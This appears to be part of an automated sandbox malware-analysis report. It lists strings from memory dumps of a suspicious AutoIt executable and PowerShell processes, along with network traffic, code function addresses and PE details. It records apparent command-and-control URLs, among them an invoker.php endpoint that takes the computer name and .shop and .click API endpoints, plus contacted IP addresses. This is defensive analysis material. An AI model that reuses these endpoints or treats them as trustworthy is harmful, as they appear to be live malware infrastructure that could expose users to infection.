Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0614000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 0000001C.00000002.2134794357.0000000005214000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online
Source: powershell.exe, 0000001C.00000002.2132862025.000000000336C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=
Source: powershell.exe, 0000001C.00000002.2134794357.0000000005214000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=user-PCLg
Source: powershell.exe, 0000001C.00000002.2165120458.0000000008212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compname=
Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD047F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: https://epicsupport.force.com/unrealengine/s/
Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001C.00000002.2134794357.00000000053D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 0000001E.00000002.2348706080.0000000007572000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.c
Source: Lightweight.com, 00000017.00000003.2161329434.0000000005D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: Lightweight.com, 00000017.00000002.2307418203.0000000003B40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://klipsyzogey.shop/
Source: Lightweight.com, 00000017.00000003.2278853392.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000002.2307418203.0000000003BBE000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000002.2309158308.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://klipsyzogey.shop/int_clp_sha.txt
Source: Lightweight.com, 00000017.00000002.2299988690.0000000000CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipsyzogey.shop:443/int_clp_sha.txt4.dbPK
Source: Lightweight.com, 00000017.00000002.2304957335.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://laborersquei.click/
Source: Lightweight.com, 00000017.00000002.2300915900.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.2278853392.0000000003BB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://laborersquei.click/api
Source: Lightweight.com, 00000017.00000002.2300915900.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://laborersquei.click/apie
Source: Lightweight.com, 00000017.00000002.2299988690.0000000000CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://laborersquei.click:443/api
Source: powershell.exe, 0000001C.00000002.2156080772.000000000611A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: Lightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Lightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Mf.20.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr	String found in binary or memory: https://www.globalsign.com/repository/03
Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Lightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.c0yfKF26qNRb
Source: Lightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.w0HgyL2ZPBj2
Source: Lightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: Lightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Lightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: installer_1.05_36.4.exe.10.dr	String found in binary or memory: https://www.ssl.com/repository0

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.214.186:443 -> 192.168.2.16:49719 version: TLS 1.2

Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD078E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_0c1b5432-a

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_04C0F4E0	28_2_04C0F4E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_04C0F4E0	28_2_04C0F4E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_078977A8	28_2_078977A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_087E7620	28_2_087E7620
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_087EBAB8	28_2_087EBAB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_087EBAA8	28_2_087EBAA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_087ECCB0	28_2_087ECCB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_087E0040	28_2_087E0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_087E0013	28_2_087E0013
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_087E7610	28_2_087E7610
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08B580F0	28_2_08B580F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08B56B48	28_2_08B56B48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08B53DA9	28_2_08B53DA9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08B57548	28_2_08B57548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08B53E10	28_2_08B53E10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08B53E01	28_2_08B53E01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08B91AC0	28_2_08B91AC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08B91AC0	28_2_08B91AC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08B97520	28_2_08B97520
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08C9B8E2	28_2_08C9B8E2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08C96398	28_2_08C96398
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08C989C4	28_2_08C989C4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08C9F160	28_2_08C9F160
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08C9DC00	28_2_08C9DC00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08C94DD0	28_2_08C94DD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08C99D51	28_2_08C99D51
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08C90D50	28_2_08C90D50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08C9E600	28_2_08C9E600
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D10CD0	28_2_08D10CD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D15158	28_2_08D15158
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D162E8	28_2_08D162E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D19AA4	28_2_08D19AA4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D15450	28_2_08D15450
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D145F0	28_2_08D145F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D13530	28_2_08D13530
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D18ED0	28_2_08D18ED0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D16EB8	28_2_08D16EB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D16FD8	28_2_08D16FD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D1CFE8	28_2_08D1CFE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08D6D998	28_2_08D6D998
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DC62C0	28_2_08DC62C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DC02E0	28_2_08DC02E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DC0250	28_2_08DC0250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DD9670	28_2_08DD9670
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DD2808	28_2_08DD2808
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DD6BBA	28_2_08DD6BBA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DE1840	28_2_08DE1840
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DEAA78	28_2_08DEAA78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DEBC80	28_2_08DEBC80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DE85D8	28_2_08DE85D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DE35D8	28_2_08DE35D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DE8BC8	28_2_08DE8BC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DE35D8	28_2_08DE35D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DD44D0	28_2_08DD44D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_08DCC381	28_2_08DCC381
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_082F3328	30_2_082F3328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08750040	30_2_08750040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_0875F4E0	30_2_0875F4E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_0875BD60	30_2_0875BD60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_0875BD38	30_2_0875BD38
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08750013	30_2_08750013
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_087527C0	30_2_087527C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_087527B0	30_2_087527B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_087C70E8	30_2_087C70E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_087C70E8	30_2_087C70E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_088673B8	30_2_088673B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_0886BEC0	30_2_0886BEC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08862ED0	30_2_08862ED0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08862EE0	30_2_08862EE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_0886A638	30_2_0886A638
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_0886D7B8	30_2_0886D7B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08896209	30_2_08896209
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08893338	30_2_08893338
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_0889F1A0	30_2_0889F1A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08891AE8	30_2_08891AE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_088974E8	30_2_088974E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_0897C1FB	30_2_0897C1FB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08A10040	30_2_08A10040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08A12F80	30_2_08A12F80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08A10006	30_2_08A10006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08A1C060	30_2_08A1C060
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08A17B50	30_2_08A17B50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08A15C00	30_2_08A15C00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08A50040	30_2_08A50040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08A555F8	30_2_08A555F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08A7C8C8	30_2_08A7C8C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08A71988	30_2_08A71988
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08A7BF60	30_2_08A7BF60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08AC59A0	30_2_08AC59A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08ACF530	30_2_08ACF530
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08ACB728	30_2_08ACB728
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08AC59A0	30_2_08AC59A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08AD28D8	30_2_08AD28D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08AD28D8	30_2_08AD28D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08ADE0E0	30_2_08ADE0E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08AD28D8	30_2_08AD28D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08ADE0E0	30_2_08ADE0E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08ADE0E0	30_2_08ADE0E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08AD28D8	30_2_08AD28D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08AD28D8	30_2_08AD28D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08AEA57A	30_2_08AEA57A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08ACD4E0	30_2_08ACD4E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_0889C7E1	30_2_0889C7E1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_08AD8775	30_2_08AD8775

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: lang-1058.dll.10.dr

Static PE information: Resource name: RT_STRING type: DOS executable (COM)

Source: lang-1058.dll.10.dr	Static PE information: No import functions for PE file found
Source: lang-1049.dll.10.dr	Static PE information: No import functions for PE file found

Source: opengl64.dll.10.dr

Binary string: 4: Use Windows functions, use names such as DirectX Device (newest, most promising)r.DriverDetectionMethodD:\build\++Portal\Sync\Engine\Source\Runtime\Core\Public\GenericPlatform/GenericPlatformProcess.hURLParmsWindows (unknown version)Windows 2000ProfessionalDatacenter ServerAdvanced ServerWindows XPHome EditionWindows Server 2003 R2Windows Storage Server 2003Windows Home ServerProfessional x64 EditionWindows Server 2003Windows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 8Windows Server 2012Windows 8.1Windows Server 2012 R2Windows 11Windows 10Windows Server 2022Windows Server 2019ReleaseIdSOFTWARE\Microsoft\Windows NT\CurrentVersion (Release %s)GetProductInfokernel32.dllUltimate EditionHome Premium EditionHome Basic EditionEnterprise EditionBusiness EditionStarter EditionCluster Server EditionDatacenter EditionDatacenter Edition (core installation)Enterprise Edition (core installation)Enterprise Edition for Itanium-based SystemsSmall Business ServerSmall Business Server Premium EditionStandard EditionStandard Edition (core installation)Web Server Edition(type unknown)64bit%d.%d.%d.%d.%d.%sPureVirtualFunctionCalledWhileRunningAppPure virtual function being called while application was running (GIsRunning == 1).Pure virtual function being calledError_ResolutionTooLowLaunchThe current resolution is too low to run this game.Computer: %sCPU Page size=%i, Cores=%iHigh frequency timer resolution =%f MHzConsoleCtrl RequestExit*** INTERRUPTED *** : SHUTTING DOWN*** INTERRUPTED *** : CTRL-C TO FORCE QUITntdll.dllRtlAreLongPathsEnabledAttempting to run KillAllPopUpBlockingWindowsKillAllPopUpBlockingWindows.batWin RequestExitOutBuffer && BufferCountCoCreateGuid( (GUID*)&Result )==((HRESULT)0L)No to AllYes to AllNoToAllYesToAllusehyperthreading-corelimit=SoftwareFWindowsPlatformMisc::SetStoredValue: ERROR: Could not store value for '%s'. Error Code %u: %sDevice DescriptionDriverDesc\SettingsProviderNameNVIDIAAdvanced Micro DevicesIntelDriverVersionCatalyst_VersionCatalyst RadeonSoftwareEditionRadeonSoftwareVersionDriverDateEnumDisplayDevices: %d. '%s' (P:%d D:%d)JumpOverNonPrimary \Registry\Machine\\HKEY_LOCAL_MACHINE\GetVideoDriverDetailsInvalid PrimaryIsNotTheChoosenAdapter PrimaryDriverLocationFailed FoundDriverCount:%d DebugString: %sSYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\%04dFoundDriverCount:%d FallbackToPrimary \Device\Video0HARDWARE\DEVICEMAP\VIDEOQueryForPrimaryFailed MachineGuidSoftware\Microsoft\CryptographyDefaultProviderNameStreamingInstallData

Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD047F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	Binary or memory string: .Target.cs.Build.csSourceIntermediate/TargetInfo.json-Mode=QueryTargets -Project="%s" -Output="%s"Unable to read target info for %s.slnUnreal ProjectsUnrealEngineLauncher/LauncherInstalled.datUE_4.040003UE_4.11040003InstallationListInstallLocationUnrealEngineLauncher/Data/Manifests/%s.manifestCustomFieldsInstallLocation*.upluginIntermediate5.0EASaved/ConfigEditorGameAgnosticCreatedProjectPathsRecentlyOpenedProjectFiles(ProjectName="/Templates/
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD047F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	Binary or memory string: SOFTWARE\SOFTWARE\Wow6432Node\MSBuild/14.0/bin/MSBuild.exeMSBuild.exeMSBuildToolsPathMicrosoft\MSBuild\ToolsVersions\14.0MSBuild\15.0\bin\MSBuild.exe15.0Microsoft\VisualStudio\SxS\VS7Microsoft\MSBuild\ToolsVersions\12.0Microsoft\MSBuild\ToolsVersions\4.0Building UnrealBuildTool in %s...Project file not found at %sCouldn't find MSBuild installation; skipping./nologo /verbosity:quiet "%s" /property:Configuration=Development /property:Platform=AnyCPURunning: %s %sFailed to start process.Missing %s after buildTargetsEngine/Source/Programs/UnrealBuildTool/UnrealBuildTool.csprojEngine/Config/UnrealBuildToolPlatformPathsEngine/Binaries/DotNET/UnrealBuildTool.exeLauncher.Platform_%sLauncher.Platform_%s.LargeLauncher.Platform_%s.XLargeD:/build/++Portal/Sync/Engine/Source/Developer/DesktopPlatform/Private/PlatformInfo.cppCookFlavorBuildFlavorUnknown platform flag %s in PlatformInfobTargetPlatformCanUseCrashReporterDataDrivenPlatformInfo section [PreviewPlatform %s] must specify a PlatformNamePlatformName != 